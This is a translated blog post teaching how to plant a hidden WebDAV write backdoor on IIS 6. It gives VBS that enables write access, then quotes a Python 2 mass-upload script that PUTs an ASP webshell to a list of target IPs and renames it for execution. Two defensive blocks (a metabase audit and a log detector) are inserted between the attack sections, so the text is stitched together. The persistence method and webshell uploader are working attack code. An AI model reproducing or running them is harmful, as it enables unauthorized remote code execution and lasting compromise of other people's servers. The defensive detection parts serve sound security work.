
A little-known way to leave a backdoor in IIS

  What I am writing down today is how to deliberately create the WebDAV authenticated-upload hole, commonly known as "exploiting IIS write permission".

  To use this as a "backdoor" I think it has to satisfy the latter of the two points I mentioned above, so it is best to pick a path that crawlers and ordinary relative-path web brute forcing are unlikely to hit, and enable Write permission on that. Of course, once the WebDAV extension is on, an OPTIONS request makes it very easy to tell that you have PUT and MOVE permission. Turning these settings on by hand would mean opening IIS Manager and clicking through the GUI, but when hacking, doing everything in a shell is of course the most stylish, so we may as well implement the whole process in VBS.

  For IIS 6:

  Option Explicit

  ' Enable the WebDAV web service extension on the IIS 6 server (ADSI, IIS:// provider)
  Dim objIIsWebService
  Set objIIsWebService = GetObject("IIS://localhost/W3SVC")
  objIIsWebService.EnableWebServiceExtension "WEBDAV"
  objIIsWebService.SetInfo

  ' Turn on Read, Source, Write and directory browsing for the default site's root
  Dim objIIsWebSite
  Set objIIsWebSite = GetObject("IIS://localhost/W3SVC/1/ROOT")
  objIIsWebSite.AccessRead = True
  objIIsWebSite.AccessSource = True
  objIIsWebSite.AccessWrite = True
  objIIsWebSite.EnableDirBrowsing = True
  objIIsWebSite.SetInfo

  What needs explaining here is the path form used by ADSI, IIS://ComputerName/Service/Website/Directory. The Website part is the site's identifier, which you can read from the Identifier column in IIS Manager, obtain with a small script such as IISSPY, or get from the VBS scripts that ship with IIS. For example, the default site's absolute path C:\inetpub\wwwroot ===> IIS://localhost/W3SVC/1/ROOT, so the darkray directory under its root corresponds to IIS://localhost/W3SVC/1/ROOT/darkray. In fact you can write a more polished script that creates a virtual directory mapped to a non-default path, for example somewhere under D:\reycler; for more, see 《使用腳本對IIS進行深入管理》 (In-depth IIS management with scripts) & http://blog.sina.com.cn/s/blog_9840bb7f0100xyxl.html.
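The defender's counterpart to the VBS above is to walk the same IIS:// tree and report any node that has AccessWrite set while the WebDAV extension is allowed. The following is an added example, not code from the page or its author. It binds to the metabase through pywin32's win32com.client.GetObject when run with --live on the IIS 6 host (assumed installed; iteration over an ADSI container's children and property access by name are assumed to behave as they do in the VBS), and otherwise runs against a constructed FakeNode tree that mirrors the page's darkray example. The WebSvcExtRestrictionList entry layout (status,path,deletable,groupid,description) is an assumption about the documented IIS 6 format.

```python
"""Audit an IIS 6 metabase for WebDAV plus Write access (added example, not the page's code)."""
import sys

# ADSI classes that carry the Access* flags the VBS above sets
WEB_NODE_CLASSES = {"IIsWebService", "IIsWebServer", "IIsWebVirtualDir", "IIsWebDirectory"}


def find_writable(node):
    """Walk the IIS:// tree; yield (ADsPath, EnableDirBrowsing) for every node with AccessWrite set.

    Works on win32com ADSI objects (property access by name, iteration over children,
    both assumed) and on the constructed FakeNode class below.
    """
    if getattr(node, "Class", "") not in WEB_NODE_CLASSES:
        return
    if getattr(node, "AccessWrite", False):
        yield (node.ADsPath, bool(getattr(node, "EnableDirBrowsing", False)))
    for child in node:
        for hit in find_writable(child):
            yield hit


def webdav_extension_enabled(w3svc):
    """True when the WebDAV group in WebSvcExtRestrictionList is allowed (status field '1').

    Assumed entry layout: 'status,path,deletable,groupid,description'.
    """
    entries = getattr(w3svc, "WebSvcExtRestrictionList", None) or ()
    for entry in entries:
        parts = str(entry).split(",")
        if len(parts) >= 4 and parts[3].strip().lower() == "webdav":
            return parts[0].strip() == "1"
    return False


def audit(w3svc):
    """Combine both checks: write access only matters if WebDAV is reachable."""
    writable = list(find_writable(w3svc))
    enabled = webdav_extension_enabled(w3svc)
    return {"webdav_enabled": enabled, "writable": writable, "exposed": enabled and bool(writable)}


class FakeNode(object):
    """Constructed stand-in for an ADSI node so the walk runs without a Windows host."""

    def __init__(self, cls, path, children=(), **props):
        self.Class, self.ADsPath = cls, path
        self._children = list(children)
        for name, value in props.items():
            setattr(self, name, value)

    def __iter__(self):
        return iter(self._children)


# Constructed tree mirroring the page's example: the default site root stays read-only,
# a hidden 'darkray' vdir has Write plus directory browsing, and WebDAV is allowed
SAMPLE_W3SVC = FakeNode(
    "IIsWebService", "IIS://localhost/W3SVC",
    children=[FakeNode(
        "IIsWebServer", "IIS://localhost/W3SVC/1",
        children=[FakeNode(
            "IIsWebVirtualDir", "IIS://localhost/W3SVC/1/ROOT", AccessWrite=False,
            children=[
                FakeNode("IIsWebVirtualDir", "IIS://localhost/W3SVC/1/ROOT/darkray",
                         AccessWrite=True, EnableDirBrowsing=True),
                FakeNode("IIsWebDirectory", "IIS://localhost/W3SVC/1/ROOT/images", AccessWrite=False),
            ])])],
    WebSvcExtRestrictionList=["1,C:\\WINDOWS\\system32\\inetsrv\\httpext.dll,0,WebDAV,WebDAV"],
)


def live_w3svc():
    """On the IIS 6 host itself, bind to the real metabase through pywin32 (assumed installed)."""
    import win32com.client
    return win32com.client.GetObject("IIS://localhost/W3SVC")


if __name__ == "__main__":
    root = live_w3svc() if "--live" in sys.argv else SAMPLE_W3SVC
    report = audit(root)
    print("WebDAV extension allowed:", report["webdav_enabled"])
    for path, browsing in report["writable"]:
        print("Write enabled:", path, "(directory browsing on)" if browsing else "")
    print("EXPOSED" if report["exposed"] else "no writable WebDAV path found")
```

Run it periodically and diff the output: a new node with Write enabled under a name nobody recognises is exactly the kind of quiet change the text describes, and it will not show up in crawler-based scans of the site.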

  What remains is the exploitation: you can use the small IISPUT tool from the veteran 老兵, send the requests with Burp, or use curl in a shell for show. Here I quote a ready-made Python script:

  http://www.subhashdasyam.com/2011/04/python-iis-scanner-with-auto-uploading.html

  #!/usr/bin/python
  # Python 2 script quoted from the URL above: OPTIONS probe, then PUT, then MOVE
  import socket, re, urllib, urllib2, os, sys

  def options():
      # Ask the server which verbs it allows; a DAV header in the reply means WebDAV is on
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.connect((t_IP, t_port))
      req = "OPTIONS / HTTP/1.1\r\n"
      req += "Host: " + t_IP + "\r\n"
      req += "Connection: close\r\n"
      req += "\r\n"
      #print req
      sock.send(req)
      data = sock.recv(1024)
      sock.close()
      r1 = re.compile('DAV')
      result = r1.findall(data)
      if result == []:
          print "On bad...the web DAV is not open.\n"
          return False
      else:
          print "WA HAHA LET US CHECK MORE time"
          return True

  def put():
      # Upload the file as plain .txt first
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.connect((t_IP, t_port))
      text = '<%execute request("hacker")%>'
      print "File content:\n" + text
      file_length = len(text)
      req = "PUT /" + 'temp003.txt' + " HTTP/1.1\r\n"
      req += "Connection: close\r\n"
      req += "Host: " + t_IP + "\r\n"
      req += "Content-Type: text/xml; charset='utf-8'\r\n"
      req += "Content-Length: " + str(file_length) + "\r\n\r\n"
      req += text + "\r\n"
      sock.send(req)
      data = sock.recv(1024)
      sock.close()
      r2 = re.compile('OK')
      result = r2.findall(data)
      if result == []:
          print "On bad...the web is not written.\n"
      else:
          print "OK code uploaded"
          print "\ncode here " + 'http://' + t_IP + '/' + 'temp003.txt'

  def move():
      # Rename the uploaded .txt to an .asp;jpg name with the WebDAV MOVE verb
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      sock.connect((t_IP, t_port))
      req = "MOVE /" + 'temp003.txt' + " HTTP/1.1\r\n"
      req += "Host: " + t_IP + "\r\n"
      req += "Destination: http://" + t_IP + '/' + 'temp003.asp;jpg' + "\r\n\r\n"
      sock.send(req)
      data = sock.recv(1024)
      sock.close()
      r3 = re.compile('asp')
      result = r3.findall(data)
      if result == []:
          print "On bad...the web is not written.\n"
      else:
          print "\n_shell :D and check RESULT.TXT\nhttp://" + t_IP + '/' + 'temp003.asp;jpg' + "\n"
          temp = "http://" + t_IP + '/' + 'temp003.asp;jpg'
          os.system('echo' + ' ' + temp + ' >>RESULT.txt')

  t_port = 80
  print "===============Auto Upload Shell=================="
  print "\n[1] Check the Vulnerability"
  #IP = raw_input("enter your target ip like 1.1.1.0/24:")
  #inp = raw_input("enter your choice:")
  #if inp == '1':
  #    if options():
  #        put()
  #        move()
  IP = raw_input("enter your txt position like C:\\1.txt:")
  f = open(IP, 'r')
  lines = f.readlines()
  #b = 'nmap' + ' ' + '--open ' + '' + '-p 80 ' + '' + IP
  #print b + '\n' + 'Now go for find the dork server'
  #a = str(os.popen(b).readlines())
  #r1 = re.compile("\d*\.\d*\.\d*\.\d*")
  #ip = r1.findall(a)
  ips = []
  #if ip == []:
  #    sys.exit()
  for x in lines:
      x = x.strip()
      ips.append(x)
  for y in ips:
      t_IP = y
      try:
          print 'now scan the ' + y
          # options() now returns True/False instead of always None, so the PUT/MOVE
          # steps only run when the DAV header was actually seen
          if options():
              put()
              move()
      except:
          continue
  print "Enjoy the Shell"
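Everything the script above does leaves a trace in the IIS W3C log: an OPTIONS probe, a PUT answered with 201, a MOVE, and then a GET of a name like temp003.asp;jpg. The following detection is an added example (not part of the page or the quoted script) that parses constructed IIS 6 W3C log lines using the #Fields directive, flags WebDAV write verbs and script extensions followed by a semicolon, and notes whether the same client sent OPTIONS first. The log lines and IP addresses are constructed samples.

```python
"""Flag WebDAV write activity in IIS 6 W3C extended logs (added example, not from the page)."""
import re

# Verbs that create, rename or delete content over WebDAV
WRITE_VERBS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
# A script extension followed by ';' (e.g. temp003.asp;jpg), the name shape the script above produces
SCRIPT_EXT_SEMICOLON = re.compile(r"\.(asp|aspx|asa|asax|ashx|cer|cdx);", re.IGNORECASE)

# Constructed sample log: one probe/upload/rename sequence, one refused PUT, plus normal traffic
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2013-05-01 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2013-05-01 10:00:01 10.0.0.5 GET /index.html - 80 - 10.0.0.77 Mozilla/5.0 200 0 0
2013-05-01 10:00:02 10.0.0.5 OPTIONS / - 80 - 203.0.113.9 - 200 0 0
2013-05-01 10:00:03 10.0.0.5 PUT /darkray/temp003.txt - 80 - 203.0.113.9 - 201 0 0
2013-05-01 10:00:04 10.0.0.5 MOVE /darkray/temp003.txt - 80 - 203.0.113.9 - 201 0 0
2013-05-01 10:00:05 10.0.0.5 GET /darkray/temp003.asp;jpg - 80 - 203.0.113.9 - 200 0 0
2013-05-01 10:00:06 10.0.0.5 PUT /upload/x.txt - 80 - 198.51.100.4 - 403 0 0
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the most recent #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # skip records that do not match the declared layout
        yield dict(zip(fields, parts))


def analyze(text):
    """Return findings as dicts: rule, client, method, uri, status, succeeded, after_options."""
    findings = []
    probed = set()  # clients that sent OPTIONS earlier in this log
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        client = rec["c-ip"]
        uri = rec["cs-uri-stem"]
        status = int(rec["sc-status"])
        if method == "OPTIONS":
            probed.add(client)
        rules = []
        if method in WRITE_VERBS:
            rules.append("webdav_write")
        if SCRIPT_EXT_SEMICOLON.search(uri):
            rules.append("script_ext_semicolon")
        for rule in rules:
            findings.append({
                "rule": rule, "client": client, "method": method, "uri": uri,
                "status": status, "succeeded": 200 <= status < 300,
                "after_options": client in probed,
            })
    return findings


def clients_with_successful_writes(findings):
    """Clients whose write verb got a 2xx answer: the ones to investigate first."""
    return sorted({f["client"] for f in findings if f["rule"] == "webdav_write" and f["succeeded"]})


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        flag = "SUCCESS" if f["succeeded"] else "refused"
        print("%-22s %-15s %-7s %-4d %-8s %s" % (f["rule"], f["client"], f["method"], f["status"], flag, f["uri"]))
    print("clients with successful writes:", clients_with_successful_writes(results))
```

Note that the W3C log records only the source URI of a MOVE, not its Destination header, so the renamed name is first visible in the later GET; that is why the semicolon rule is applied to every method, not just the write verbs.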
